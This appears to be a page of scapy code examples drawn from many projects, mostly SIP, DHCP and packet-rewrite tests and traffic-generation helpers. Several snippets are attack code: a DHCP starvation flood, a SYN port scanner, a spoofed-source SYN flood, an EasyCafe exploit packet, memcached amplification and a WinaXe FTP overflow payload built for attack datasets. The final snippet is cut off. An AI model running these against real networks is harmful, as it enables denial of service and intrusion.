コード例 #1
0
    def test_getSipCallFlowFrom_when_simpleScenario(self):
        a = scapy_layers.IP(
            src="127.0.0.2", dst="127.0.0.5"
        ) / scapy_layers.UDP(
            sport=5050, dport=5010
        ) / "OPTIONS sip:Fw-NMS-2:5060 SIP/2.0\r\nVia: SIP/2.0/UDP 10.252.47.186:5060;branch=z9hG4bK0g04430050bgj18o80j1\r\nTo: sip:ping@Fw-NMS-2\r\nFrom: <sip:[email protected]>;tag=g000000q5m200-jbe0000\r\nCall-ID: [email protected]\r\nCSeq: 14707 OPTIONS\r\nMax-Forwards: 0\r\nContent-Length: 0\r\n\r\n"
        b = scapy_layers.IP(
            src="127.0.0.5", dst="127.0.0.2"
        ) / scapy_layers.UDP(
            sport=5010, dport=5050
        ) / "OPTIONS sip:Fw-NMS-2:5060 SIP/2.0\r\nVia: SIP/2.0/UDP 10.252.47.186:5060;branch=z9hG4bK0g04430050bgj18o80j1\r\nTo: sip:ping@Fw-NMS-2\r\nFrom: <sip:[email protected]>;tag=g000000q5m200-jbe0000\r\nCall-ID: [email protected]\r\nCSeq: 14707 OPTIONS\r\nMax-Forwards: 0\r\nContent-Length: 0\r\n\r\n"
        packets = [a, b]
        client = pcap_helper.PeerData(ip="127.0.0.2",
                                      port=5050,
                                      protocol=scapy_layers.UDP)

        callFlow = pcap_helper.getSipCallFlowFrom(packets, client)

        self.assertEqual(2, len(callFlow))
        firstPacketInfo = pcap_helper.PacketInfo(a,
                                                 pcap_helper.CLIENT_TO_SERVER)
        self.assertEqual(firstPacketInfo, callFlow[0])
        secondPacketInfo = pcap_helper.PacketInfo(b,
                                                  pcap_helper.SERVER_TO_CLIENT)
        self.assertEqual(secondPacketInfo, callFlow[1])
コード例 #2
0
 def test_packetsHandler_typical(self):
     a = scapy_layers.IP() / scapy_layers.UDP(
     ) / "OPTIONS sip:Fw-NMS-2:5060 SIP/2.0\r\nVia: SIP/2.0/UDP 10.252.47.186:5060;branch=z9hG4bK0g04430050bgj18o80j1\r\nTo: sip:ping@Fw-NMS-2\r\nFrom: <sip:[email protected]>;tag=g000000q5m200-jbe0000\r\nCall-ID: [email protected]\r\nCSeq: 14707 OPTIONS\r\nMax-Forwards: 0\r\nContent-Length: 0\r\n\r\n"
     b = scapy_layers.IP() / scapy_layers.UDP(
     ) / "OPTIONS sip:Fw-NMS-2:5060 SIP/2.0\r\nVia: SIP/2.0/UDP 10.252.47.186:5060;branch=z9hG4bK0g04430050bgj18o80j1\r\nTo: sip:ping@Fw-NMS-2\r\nFrom: <sip:[email protected]>;tag=g000000q5m200-jbe0000\r\nCall-ID: [email protected]\r\nCSeq: 14707 OPTIONS\r\nMax-Forwards: 0\r\nContent-Length: 0\r\n\r\n"
     c = [a, b]
     pcap_helper.packetsHandler(
         c, "[email protected]")
コード例 #3
0
 def test_packetsHandler_when_NoPacketsMatched(self):
     a = scapy_layers.IP() / scapy_layers.UDP(
     ) / "OPTIONS sip:Fw-NMS-2:5060 SIP/2.0\r\nVia: SIP/2.0/UDP 10.252.47.186:5060;branch=z9hG4bK0g04430050bgj18o80j1\r\nTo: sip:ping@Fw-NMS-2\r\nFrom: <sip:[email protected]>;tag=g000000q5m200-jbe0000\r\nCall-ID: [email protected]\r\nCSeq: 14707 OPTIONS\r\nMax-Forwards: 0\r\nContent-Length: 0\r\n\r\n"
     b = scapy_layers.IP() / scapy_layers.UDP(
     ) / "OPTIONS sip:Fw-NMS-2:5060 SIP/2.0\r\nVia: SIP/2.0/UDP 10.252.47.186:5060;branch=z9hG4bK0g04430050bgj18o80j1\r\nTo: sip:ping@Fw-NMS-2\r\nFrom: <sip:[email protected]>;tag=g000000q5m200-jbe0000\r\nCall-ID: [email protected]\r\nCSeq: 14707 OPTIONS\r\nMax-Forwards: 0\r\nContent-Length: 0\r\n\r\n"
     c = [a, b]
     with self.assertRaises(SystemExit) as se:
         pcap_helper.packetsHandler(
             c, "[email protected]")
     self.assertEqual(se.exception.code, 0)
コード例 #4
0
    def ttl_dst_default(self):
        src_ref = '83.78.233.252'
        dst_ref = '181.149.152.176'
        
        ref_pkt = inet.IP(src=src_ref, dst=dst_ref, ttl=100)
        mac_pkt = inet.IP(src=src_ref, dst=dst_ref, ttl=1)

        data = lib.build_mock_dict()

        pp.ip_ttl_change(mac_pkt, data)

        self.assertTrue( lib.compare_mac_pkts(ref_pkt, mac_pkt), msg= (str(ref_pkt) + ' == ' + str(mac_pkt)) )
コード例 #5
0
    def ttl_exception(self):
        src_ref = '107.149.218.168'
        dst_ref = '125.195.213.93'
        
        ref_pkt = inet.IP(src=src_ref, dst=dst_ref, ttl=1)
        mac_pkt = inet.IP(src=src_ref, dst=dst_ref, ttl=1)

        data = lib.build_mock_dict()

        pp.ip_ttl_change(mac_pkt, data)

        self.assertTrue( lib.compare_mac_pkts(ref_pkt, mac_pkt), msg= (str(ref_pkt) + ' == ' + str(mac_pkt)) )
コード例 #6
0
    def ttl_src_replace(self):
        src_ref = '181.149.152.176'
        dst_ref = '125.195.213.93'
        
        ref_pkt = inet.IP(src=src_ref, dst=dst_ref, ttl=99)
        mac_pkt = inet.IP(src=src_ref, dst=dst_ref, ttl=1)

        data = lib.build_mock_dict()

        pp.ip_ttl_change(mac_pkt, data)

        self.assertTrue( lib.compare_mac_pkts(ref_pkt, mac_pkt), msg= (str(ref_pkt) + ' == ' + str(mac_pkt)) )
コード例 #7
0
    def ipdst_adrExists(self):
        src_ref = '83.78.233.252'
        dst_ref = '181.149.152.176'
        
        ref_pkt = inet.IP(src=src_ref, dst='124.233.255.79')
        mac_pkt = inet.IP(src=src_ref, dst=dst_ref)

        data = lib.build_mock_dict()

        pp.ip_dst_change(mac_pkt, data)

        self.assertTrue( lib.compare_mac_pkts(ref_pkt, mac_pkt), msg= (str(ref_pkt) + ' == ' + str(mac_pkt)) )
コード例 #8
0
    def ipdst_adrNotExist(self):
        src_ref = '83.78.233.252'
        dst_ref = '125.195.213.93'
        
        ref_pkt = inet.IP(src=src_ref, dst=dst_ref)
        mac_pkt = inet.IP(src=src_ref, dst=dst_ref)

        data = lib.build_mock_dict()

        pp.ip_dst_change(mac_pkt, data)

        self.assertTrue( lib.compare_mac_pkts(ref_pkt, mac_pkt), msg= (str(ref_pkt) + ' == ' + str(mac_pkt)) )
コード例 #9
0
 def dhcp_offer(self, device, fromBackdoor=False):
     if device.yiaddr == '0.0.0.0':
         yiaddr = self.ip_addr_allocate(device.hwAddr)
         device.yiaddr = yiaddr
     else:
         yiaddr = device.yiaddr
     print('offer ip: %s' % yiaddr)
     packet = (
         l2.Ether(dst="ff:ff:ff:ff:ff:ff", src=self.etherSrc) /
         inet.IP(src=self.myIP, dst="255.255.255.255") /
         inet.UDP(sport=67, dport=68) /
         dhcp.BOOTP(op=2,
                    chaddr=macTransfer(device.hwAddr),
                    yiaddr=yiaddr,
                    xid=device.xid) /
         dhcp.DHCP(options=[("message-type", "offer"), ("lease_time", 7200),
                            ("server_id", self.myIP),
                            ("vendor_class_id",
                             device.vendor_class_id), "end"]))
     #print(str(packet).encode('hex'))
     #print(macTransfer("00:0e:5e:00:00:0a"))
     try:
         if fromBackdoor == False:
             sendrecv.sendp(packet,
                            iface=self.iface,
                            count=1,
                            verbose=False)
     except:
         raise
コード例 #10
0
    def dhcp_ack(self, device, fromBackdoor=False):
        yiaddr = device.yiaddr
        print('ack ip: %s' % yiaddr)
        packet = (
            l2.Ether(dst="ff:ff:ff:ff:ff:ff", src=self.etherSrc) /
            inet.IP(src=self.myIP, dst=yiaddr) / inet.UDP(sport=67, dport=68) /
            dhcp.BOOTP(op=2,
                       chaddr=macTransfer(device.hwAddr),
                       yiaddr=yiaddr,
                       xid=device.xid) / dhcp.DHCP(options=[
                           ("message-type", "ack"),
                           ("lease_time", 7200),
                           ("server_id", self.myIP),
                           ("subnet_mask", self.subnetMask),
                           ("router", self.router),
                           ("vendor_class_id", device.vendor_class_id),
                           #("client_id",device.client_id),
                           "end"
                       ]))
        try:
            if fromBackdoor == False:
                sendrecv.sendp(packet,
                               iface=self.iface,
                               count=1,
                               verbose=False)
        except:
            raise

        device.yiaddr_acked = True
コード例 #11
0
ファイル: xena.py プロジェクト: chetangaonker/vswitchperf
 def _build_packet_header(self, reverse=False):
     """
     Build a packet header based on traffic profile using scapy external
     libraries.
     :param reverse: Swap source and destination info when building header
     :return: packet header in hex
     """
     srcmac = self._params['traffic']['l2'][
         'srcmac'] if not reverse else self._params['traffic']['l2'][
             'dstmac']
     dstmac = self._params['traffic']['l2'][
         'dstmac'] if not reverse else self._params['traffic']['l2'][
             'srcmac']
     srcip = self._params['traffic']['l3'][
         'srcip'] if not reverse else self._params['traffic']['l3']['dstip']
     dstip = self._params['traffic']['l3'][
         'dstip'] if not reverse else self._params['traffic']['l3']['srcip']
     layer2 = inet.Ether(src=srcmac, dst=dstmac)
     layer3 = inet.IP(src=srcip,
                      dst=dstip,
                      proto=self._params['traffic']['l3']['proto'])
     layer4 = inet.UDP(sport=self._params['traffic']['l4']['srcport'],
                       dport=self._params['traffic']['l4']['dstport'])
     if self._params['traffic']['vlan']['enabled']:
         vlan = inet.Dot1Q(vlan=self._params['traffic']['vlan']['id'],
                           prio=self._params['traffic']['vlan']['priority'],
                           id=self._params['traffic']['vlan']['cfi'])
     else:
         vlan = None
     packet = layer2 / vlan / layer3 / layer4 if vlan else layer2 / layer3 / layer4
     packet_bytes = bytes(packet)
     packet_hex = '0x' + binascii.hexlify(packet_bytes).decode('utf-8')
     return packet_hex
コード例 #12
0
    def generate_attack_packets(self) -> None:
        ip_attacker = self.get_param_value(self.IP_SOURCE)
        mac_attacker = self.get_param_value(self.MAC_SOURCE)
        ip_amplifier = self.get_param_value(self.IP_DESTINATION)
        mac_amplifier = self.get_param_value(self.MAC_DESTINATION)
        ip_victim = self.get_param_value(self.IP_VICTIM)

        timestamp_next_pkt = self.get_param_value(self.INJECT_AT_TIMESTAMP)
        self.attack_start_utime = timestamp_next_pkt

        attack_duration = self.get_param_value(self.ATTACK_DURATION)
        attack_ends_time = timestamp_next_pkt + attack_duration

        _, src_ttl, _ = self.get_ip_data(ip_attacker)
        sport = Util.generate_source_port_from_platform('linux')

        # Use MAC of the actual source, but the IP of the victim
        attacker_ether = inet.Ether(src=mac_attacker, dst=mac_amplifier)
        attacker_ip = inet.IP(src=ip_victim, dst=ip_amplifier, ttl=src_ttl, flags='DF')

        while timestamp_next_pkt <= attack_ends_time:
            request_udp = inet.UDP(sport=sport, dport=Memcd.memcached_port)
            request_memcd = Memcd.Memcached_Request(Request=b'stats\r\n', RequestID=inet.RandShort())
            request = (attacker_ether / attacker_ip / request_udp / request_memcd)
            request.time = timestamp_next_pkt

            self.add_packet(request, ip_victim, ip_amplifier)

            timestamp_next_pkt = self.timestamp_controller.next_timestamp()
コード例 #13
0
 def _do_request_lease(self, mac_address, ip=None, timeout_sec=10):
     logging.debug(
         f"Requesting lease for mac {mac_address} ip {ip} iface {self._net_iface}"
     )
     mac_raw = codecs.decode(mac_address.replace(':', ''), 'hex')
     if ip is None:
         broadcast_flag = scapy.fields.FlagValue(0b1000000000000000,
                                                 "???????????????B")
         dhcp_discover = l2.Ether(src=self._real_mac, dst='ff:ff:ff:ff:ff:ff') / \
                         inet.IP(src='0.0.0.0', dst='255.255.255.255') / \
                         inet.UDP(dport=67, sport=68) / \
                         dhcp.BOOTP(chaddr=mac_raw, xid=scapy.volatile.RandInt(), flags=broadcast_flag) / dhcp.DHCP(options=[('message-type', 'discover'), 'end'])
         dhcp_offer = sendrecv.srp1(dhcp_discover,
                                    iface=self._net_iface,
                                    verbose=self._verbose,
                                    timeout=timeout_sec)
         if dhcp_offer is None:
             raise TimeoutError(
                 f"Timeout. failed to get offer for mac {mac_address} iface: {self._net_iface}"
             )
         ip = dhcp_offer[dhcp.BOOTP].yiaddr
         server_id = DHCPRequestor._server_id_from_offer(
             dhcp_offer[dhcp.BOOTP])
         xid_cookie = dhcp_offer[dhcp.BOOTP].xid
     else:
         server_id = None
         xid_cookie = 0
     return self._dhcp_request(mac_raw,
                               ip,
                               xid_cookie,
                               server_id,
                               timeout_sec=timeout_sec)
コード例 #14
0
 def set_header_layer3(self,
                       src_ip='192.168.0.2',
                       dst_ip='192.168.0.3',
                       protocol='UDP',
                       **kwargs):
     """
     Build scapy IPV4 L3 objects nside instance packet_data structure
     :param src_ip: source IP as string in dot notation format
     :param dst_ip: destination IP as string in dot notation format
     :param protocol: protocol for l4
     :param kwargs: Extra params per scapy usage
     :return: None
     """
     self.packet_data['layer3'] = [
         inet.IP(src=src_ip, dst=dst_ip, proto=protocol.lower(), **kwargs),
         inet.IP(src=dst_ip, dst=src_ip, proto=protocol.lower(), **kwargs)
     ]
コード例 #15
0
 def setUp(self):
     a = scapy_layers.IP(
         src="127.0.0.2", dst="127.0.0.5"
     ) / scapy_layers.UDP(
         sport=5050, dport=5010
     ) / "OPTIONS sip:Fw-NMS-2:5060 SIP/2.0\r\nVia: SIP/2.0/UDP 10.252.47.186:5060;branch=z9hG4bK0g04430050bgj18o80j1\r\nTo: sip:ping@Fw-NMS-2\r\nFrom: <sip:[email protected]>;tag=g000000q5m200-jbe0000\r\nCall-ID: [email protected]\r\nCSeq: 14707 OPTIONS\r\nMax-Forwards: 0\r\nContent-Length: 0\r\n\r\n"
     b = scapy_layers.IP(
         src="127.0.0.5", dst="127.0.0.2"
     ) / scapy_layers.UDP(
         sport=5010, dport=5050
     ) / "OPTIONS sip:Fw-NMS-2:5060 SIP/2.0\r\nVia: SIP/2.0/UDP 10.252.47.186:5060;branch=z9hG4bK0g04430050bgj18o80j1\r\nTo: sip:ping@Fw-NMS-2\r\nFrom: <sip:[email protected]>;tag=g000000q5m200-jbe0000\r\nCall-ID: [email protected]\r\nCSeq: 14707 OPTIONS\r\nMax-Forwards: 0\r\nContent-Length: 0\r\n\r\n"
     firstPacketInfo = pcap_helper.PacketInfo(a,
                                              pcap_helper.CLIENT_TO_SERVER)
     secondPacketInfo = pcap_helper.PacketInfo(b,
                                               pcap_helper.SERVER_TO_CLIENT)
     self.callFlow = [firstPacketInfo, secondPacketInfo]
     pass
コード例 #16
0
 def test_getDirectionFor_when_SERVER_TO_CLIENT(self):
     packet = scapy_layers.IP(
         src="127.0.0.2", dst="127.0.0.5") / scapy_layers.TCP(sport=5050,
                                                              dport=5010)
     client = pcap_helper.PeerData(ip="127.0.0.5",
                                   port=5010,
                                   protocol=scapy_layers.TCP)
     direction = pcap_helper.getDirectionFor(packet, client)
     self.assertEqual(pcap_helper.SERVER_TO_CLIENT, direction)
コード例 #17
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    def _forge_scapy_response(self, scapy_msg):
        new_msg = l2.Ether(src=scapy_msg[l2.Ether].dst, dst=scapy_msg[l2.Ether].src)
        if scapy_msg.haslayer(scapy_inet.IP):
            new_msg /= scapy_inet.IP(src=scapy_msg[scapy_inet.IP].dst, dst=scapy_msg[scapy_inet.IP].src)
        else:
            new_msg /= scapy_inet.IPv6(src=scapy_msg[scapy_inet6.IPv6].dst, dst=scapy_msg[scapy_inet6.IPv6].src)

        new_msg /= scapy_inet.UDP(sport=scapy_msg[scapy_inet.UDP].dport, dport=scapy_msg[scapy_inet.UDP].sport)

        return new_msg
コード例 #18
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 def test_getClientServerDataFrom_when_UDP(self):
     tcp_packet = scapy_layers.IP(
         src="127.0.0.2", dst="127.0.0.5") / scapy_layers.UDP(sport=5050,
                                                              dport=5010)
     client, server = pcap_helper.getClientServerDataFrom(tcp_packet)
     self.assertEqual(client.ip, "127.0.0.2")
     self.assertEqual(client.port, 5050)
     self.assertEqual(client.protocol, scapy_layers.UDP)
     self.assertEqual(server.ip, "127.0.0.5")
     self.assertEqual(server.port, 5010)
     self.assertEqual(server.protocol, scapy_layers.UDP)
コード例 #19
0
ファイル: dhcpwn.py プロジェクト: tyekrgk/dhcpwn
def dhcp_flood(**kwargs):
    iface = kwargs["interface"]
    count = kwargs["count"]

    unique_hexdigits = str.encode("".join(set(string.hexdigits.lower())))
    packet = (l2.Ether(dst="ff:ff:ff:ff:ff:ff") /
              inet.IP(src="0.0.0.0", dst="255.255.255.255") /
              inet.UDP(sport=68, dport=67) /
              dhcp.BOOTP(chaddr=volatile.RandString(12, unique_hexdigits)) /
              dhcp.DHCP(options=[("message-type", "discover"), "end"]))

    sendrecv.sendp(packet, iface=iface, count=count)
コード例 #20
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def icmp(dst: str, count=1, timeout=2, verbose=False) -> int:
    """
    Send an ICMP ping

    Returns: count of responses
    """
    c = 0
    for i in range(count):
        packet = inet.IP(dst=dst) / inet.ICMP(seq=i)
        if sr1(packet, timeout=2, verbose=verbose) is not None:
            c += 1
    return c
コード例 #21
0
ファイル: dos.py プロジェクト: wsydehub/WebAttackWithScapy
def port_scan(time_out, target_ip, port_list=None):
    a = inet.IP(dst=target_ip)
    _expose_port = []
    _start = time.time()
    if port_list is None:
        port_list = common_port.port_list_top_1000
    for port in port_list:
        pkt = a / inet.TCP(dport=port, flags='S')
        ans = sendrecv.sr1(pkt, timeout=2)
        if ans is not None and ans.haslayer(
                'TCP') and ans['TCP'].flags == 'SA':
            _expose_port.append(port)
        if _expose_port.__len__() == port_list.__len__(
        ) or time.time() - _start > time_out:
            return _expose_port
コード例 #22
0
def build_test_packet():
    try:
        import scapy.layers.inet as inet
        import scapy.utils as utils
    except:
        logging.info("Packet: Using sample packet")
        packet_hex = '0x525400c61020525400c6101008004500001400010000400066e70a0000010a000002'
    else:
        logging.info("Packet: Using scapy to build the test packet")
        L2 = inet.Ether(src="52:54:00:C6:10:10", dst="52:54:00:C6:10:20")
        L3 = inet.IP(src="10.0.0.1", dst="10.0.0.2")
        packet = L2 / L3
        packet_str = str(packet)
        packet_hex = '0x' + packet_str.encode('hex')
        # Uncomment below to see the packet in wireshark tool
        #utils.wireshark(packet)

    logging.debug("Packet string: %s", packet_hex)
    return packet_hex
コード例 #23
0
ファイル: dos.py プロジェクト: wsydehub/WebAttackWithScapy
def dos(target_ip, use_real_ip=True):
    port_list = [i for i in range(1, 65535)]
    count = 0
    while True:
        if not use_real_ip:
            a = str(random.randint(1, 254))
            b = str(random.randint(1, 254))
            c = str(random.randint(1, 254))
            d = str(random.randint(1, 254))
            dot = '.'
            source_ip = a + dot + b + dot + c + dot + d
        else:
            source_ip = arch.get_if_addr('en0')
        for source_port in random.sample(port_list, 200):
            count += 1
            IP1 = inet.IP(src=source_ip, dst=target_ip)
            TCP1 = inet.TCP(sport=source_port, dport=80)
            pkt = IP1 / TCP1
            sendrecv.send(pkt, inter=0.001)
            print(count)
コード例 #24
0
    def refreshAll(self, frame=None):
        if not frame:
            frame = self.getFrame()

        ip_packet = inet.IP(frame.payload)

        if frame.payload.payload.name == "NoPayload":
            self.statusBar.showMessage(
                "Sorry, only correct packets can be loaded. Loading L2 and L3...",
                1000)
            if self.tab_L3_Widget.currentIndex() == 0:
                self.fillIPv4(ip_packet)
            else:
                self.fillICMP(ip_packet)
            # TODO: according to current tab place values in ipv4 or icmp DONE

        if frame.payload.payload.name == "TCP":
            tcp_packet = inet.TCP(ip_packet.payload)
            self.tab_L3_Widget.setCurrentIndex(0)
            self.tab_L4_Widget.setCurrentIndex(0)
            self.fillIPv4(ip_packet)
            self.fillTCP(tcp_packet)
        elif frame.payload.payload.name == "UDP":
            udp_packet = inet.UDP(ip_packet.payload)
            self.tab_L3_Widget.setCurrentIndex(0)
            self.tab_L4_Widget.setCurrentIndex(1)
            self.fillIPv4(ip_packet)
            self.fillUDP(udp_packet)
        elif frame.payload.payload.name == "Raw" or frame.payload.payload.name == "Padding":  # ICMP, but need to be carefull if want to use this later
            self.fillICMP(ip_packet)
        elif frame.payload.payload.name == "ICMP":
            self.fillICMP(ip_packet)
            icmp_packet = inet.ICMP(ip_packet.payload)
            self.spinBox_icmp_Type.setValue(
                icmp_packet.getfield_and_val('type')[1])
            self.spinBox_icmp_Code.setValue(
                icmp_packet.getfield_and_val('code')[1])
            # TODO checksum not implemented

        self.fillEther(frame)
コード例 #25
0
    def _dhcp_request(self,
                      mac_raw,
                      requested_ip,
                      xid_cookie=0,
                      server_id="0.0.0.0",
                      timeout_sec=10):
        logging.debug(
            f"Sending dhcp request for {requested_ip} cookie {xid_cookie} server id {server_id} net {self._net_iface}"
        )
        broadcast_flag = scapy.fields.FlagValue(0b1000000000000000,
                                                "???????????????B")

        dhcp_options = [("message-type", "request")]
        if server_id is not None:
            dhcp_options.append(("server_id", server_id))
        dhcp_options.extend([("requested_addr", requested_ip),
                             ("param_req_list", 0), "end"])

        dhcp_request = l2.Ether(src=self._real_mac, dst="ff:ff:ff:ff:ff:ff") / \
                        inet.IP(src="0.0.0.0", dst="255.255.255.255") / \
                        inet.UDP(sport=68, dport=67) / \
                        dhcp.BOOTP(chaddr=mac_raw, xid=xid_cookie, flags=broadcast_flag) / \
                        dhcp.DHCP(options=dhcp_options)

        # send request, wait for ack
        dhcp_reply = sendrecv.srp1(dhcp_request,
                                   iface=self._net_iface,
                                   verbose=self._verbose,
                                   timeout=timeout_sec)
        if dhcp_reply is None:
            raise TimeoutError(
                f"DHCP request timeout on net {self._net_iface}")
        reply = DHCPRequestor._dhcp_reply_info(dhcp_reply)
        if dhcp.DHCPTypes[reply['message-type']] != 'ack':
            raise Exception("Failed to get ack %s" % reply)
        return reply
コード例 #26
0
from scapy.all import *
from scapy.layers import inet

sr_ip = '192.168.1.15'
ds_ip = '127.0.0.1'

pack = "þ\x00\x00\x00\x00\x00\x00\x00\\é\x00\x00\x01\x00\x00\x00<û\x12\x00cmáwF\x02\x02\x00\x12\x02\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00²ÁF\x00F\x02\x02\x00\x12\x02\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00Dû\x12\x00ÊÁF\x00ÒÁF\x00ì\x00\x00\x00G\x01\x00\x00¤\x84w\x01\x00\x00\x00\x00`û\x12\x00¦µE\x00\x14\x00\x00\x00añA\x00\x80\x0bp\x01\x99\x00C\x00¡\x00C\x00G\x01\x00\x00\xa0\x0bp\x01ï²E\x00`û\x12\x00\x06³E\x00\x0e³E\x00$þ\x12\x00\x18³E\x00`û\x12\x00ì\x00\x00\x00G\x01\x00\x00¤\x84w\x01\\\x04r\x01xû\x12\x00Ú\x8bB\x00\x84\x00\x00\x00\x00\x00\x00\x00^\x01Õ\x01\x01\x00\x00\x00\x98û\x12\x00¨,áwà\x02\x01\x00\x84\x00\x00\x00\x00\x00\x00\x00^\x01Õ\x01G\x01\x00\x00Í«ºÜ´û\x12\x00dGáwS\x0f\x80\x01à\x02\x01\x00\x84\x00\x00\x00\x00\x00\x00\x00^\x01Õ\x01Üû\x12\x00 Gáw\x901\x8f\x00\x84\x00\x00\x00\x00\x00\x00\x000Gáw\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 ü\x12\x00ï\x15úwìû\x12\x00\x18\x00\x00\x00\x901\x8f\x00\x84\x00\x00\x00\x00\x00\x00\x00^\x01Õ\x01S\x0f\x80\x015GáwÀÕâwµ\x02\x0e\x00.I am  a Vulnerable version of EasyCafe Client!\x00F\x02\x02\x00\x00\x00\x00\x00G\x01\x00\x00ì\x00\x00\x00tü\x12\x00\x88qp\x01´¯~\x01hnF\x00h\x01e\x00T½r\x01¼\x87E\x00T½r\x01G\x01\x00\x00ì\x00\x00\x00\x90ü\x12\x00ì\x87E\x00:\x00\x00\x00D\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x10´ü\x12\x00o\x88E\x00:\x00\x00\x00D\x00\x00\x00\x04\x02\x00\x00Tþ\x12\x00T½r\x01ìý\x12\x00\x04\x02\x00\x00ìý\x12\x00ô\x89E\x00\x00\x02\x00\x00T½r\x01Tþ\x12\x00ÿ\x85E\x00\x04\x02\x00\x00Tþ\x12\x00T½r\x01ÿ\x85E\x00<ÿ\x12\x00Tþ\x12\x00ð\x84r\x01ê\x04âw¨:\x8f\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x81÷wª®F\x00\x01\x00\x00\x00\x01\x00\x00\x00\\Ôw\x01Ðý\x12\x000ý\x12\x00Æ®F\x00ª®F\x00\x02\x00\x00\x00\x01\x00\x00\x00<\x0cw\x01Ðý\x12\x00\x062.2.14\x00ª®F\x00\n\x00\x00\x00\x01\x00\x00\x00Dñw\x01Ðý\x12\x00hý\x12\x00Æ®F\x00ª®F\x00\x00\x00\x00\x00\x18\x8cw\x01¤ý\x12\x00H®F\x01\x88ý\x12\x00^vF\x00Ðý\x12\x00\r\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01H®F\x000\x04x\x01¸ý\x12\x00)wF\x00¸ý\x12\x00\x00\x00\x00\x00Tþ\x12\x00\x00\x00\x00\x00èý\x01\x00\r\x00\x00\x00\x00\x00\x00\x00\x18\x8cw\x01H®F\x00\x00\x00\x00\x00Ðý\x12\x00"

send(inet.IP(src=sr_ip, dst=ds_ip) / inet.UDP(sport=800, dport=804) / pack)
コード例 #27
0
ファイル: FTPWinaXeExploit.py プロジェクト: xTikk/ID2T
    def generate_attack_packets(self):
        """
        Creates the attack packets.
        """
        pps = self.get_param_value(atkParam.Parameter.PACKETS_PER_SECOND)

        # Timestamp
        timestamp_next_pkt = self.get_param_value(
            atkParam.Parameter.INJECT_AT_TIMESTAMP)
        # store start time of attack
        self.attack_start_utime = timestamp_next_pkt

        # Initialize parameters
        ip_victim = self.get_param_value(atkParam.Parameter.IP_SOURCE)
        ip_attacker = self.get_param_value(atkParam.Parameter.IP_DESTINATION)
        mac_victim = self.get_param_value(atkParam.Parameter.MAC_SOURCE)
        mac_attacker = self.get_param_value(atkParam.Parameter.MAC_DESTINATION)

        custom_payload = self.get_param_value(
            atkParam.Parameter.CUSTOM_PAYLOAD)
        custom_payload_len = len(custom_payload)
        custom_payload_limit = 1000
        Util.check_payload_len(custom_payload_len, custom_payload_limit)

        self.packets = []

        # Create random victim if specified
        if self.get_param_value(atkParam.Parameter.IP_SOURCE_RANDOMIZE):
            # The most used IP class in background traffic
            most_used_ip_class = Util.handle_most_used_outputs(
                self.statistics.get_most_used_ip_class())
            ip_victim = self.generate_random_ipv4_address(
                most_used_ip_class, 1)
            mac_victim = self.generate_random_mac_address()

        # Get MSS, TTL and Window size value for victim/attacker IP
        victim_mss_value, victim_ttl_value, victim_win_value = self.get_ip_data(
            ip_victim)
        attacker_mss_value, attacker_ttl_value, attacker_win_value = self.get_ip_data(
            ip_attacker)

        min_delay, max_delay = self.get_reply_delay(ip_attacker)

        attacker_seq = rnd.randint(1000, 50000)
        victim_seq = rnd.randint(1000, 50000)

        sport = Util.generate_source_port_from_platform("win7")

        # connection request from victim (client)
        victim_ether = inet.Ether(src=mac_victim, dst=mac_attacker)
        victim_ip = inet.IP(src=ip_victim,
                            dst=ip_attacker,
                            ttl=victim_ttl_value,
                            flags='DF')
        request_tcp = inet.TCP(sport=sport,
                               dport=ftp_port,
                               window=victim_win_value,
                               flags='S',
                               seq=victim_seq,
                               options=[('MSS', victim_mss_value)])
        victim_seq += 1
        syn = (victim_ether / victim_ip / request_tcp)
        syn.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps,
                                                   min_delay)
        self.packets.append(syn)

        # response from attacker (server)
        attacker_ether = inet.Ether(src=mac_attacker, dst=mac_victim)
        attacker_ip = inet.IP(src=ip_attacker,
                              dst=ip_victim,
                              ttl=attacker_ttl_value,
                              flags='DF')
        reply_tcp = inet.TCP(sport=ftp_port,
                             dport=sport,
                             seq=attacker_seq,
                             ack=victim_seq,
                             flags='SA',
                             window=attacker_win_value,
                             options=[('MSS', attacker_mss_value)])
        attacker_seq += 1
        synack = (attacker_ether / attacker_ip / reply_tcp)
        synack.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps,
                                                   min_delay)
        self.packets.append(synack)

        # acknowledgement from victim (client)
        ack_tcp = inet.TCP(sport=sport,
                           dport=ftp_port,
                           seq=victim_seq,
                           ack=attacker_seq,
                           flags='A',
                           window=victim_win_value,
                           options=[('MSS', victim_mss_value)])
        ack = (victim_ether / victim_ip / ack_tcp)
        ack.time = timestamp_next_pkt
        timestamp_next_pkt = Util.update_timestamp(timestamp_next_pkt, pps)
        self.packets.append(ack)

        # FTP exploit packet
        ftp_tcp = inet.TCP(sport=ftp_port,
                           dport=sport,
                           seq=attacker_seq,
                           ack=victim_seq,
                           flags='PA',
                           window=attacker_win_value,
                           options=[('MSS', attacker_mss_value)])

        characters = b'220'
        characters += Util.get_rnd_bytes(2065, Util.forbidden_chars)
        characters += b'\x96\x72\x01\x68'
        characters += Util.get_rnd_x86_nop(10, False, Util.forbidden_chars)

        custom_payload_file = self.get_param_value(
            atkParam.Parameter.CUSTOM_PAYLOAD_FILE)

        # Generation of payload of the FTP exploit packet
        if custom_payload == '':
            if custom_payload_file == '':
                payload = Util.get_rnd_bytes(custom_payload_limit,
                                             Util.forbidden_chars)
            else:
                payload = ID2TLib.Utility.get_bytes_from_file(
                    custom_payload_file)
                Util.check_payload_len(len(payload), custom_payload_limit)
                payload += Util.get_rnd_x86_nop(
                    custom_payload_limit - len(payload), False,
                    Util.forbidden_chars)
        else:
            encoded_payload = custom_payload.encode()
            payload = Util.get_rnd_x86_nop(
                custom_payload_limit - custom_payload_len, False,
                Util.forbidden_chars)
            payload += encoded_payload

        characters += payload
        characters += Util.get_rnd_x86_nop(20, False, Util.forbidden_chars)
        characters += b'\r\n'

        ftp_tcp.add_payload(characters)

        ftp_buff = (attacker_ether / attacker_ip / ftp_tcp)
        ftp_buff.time = timestamp_next_pkt
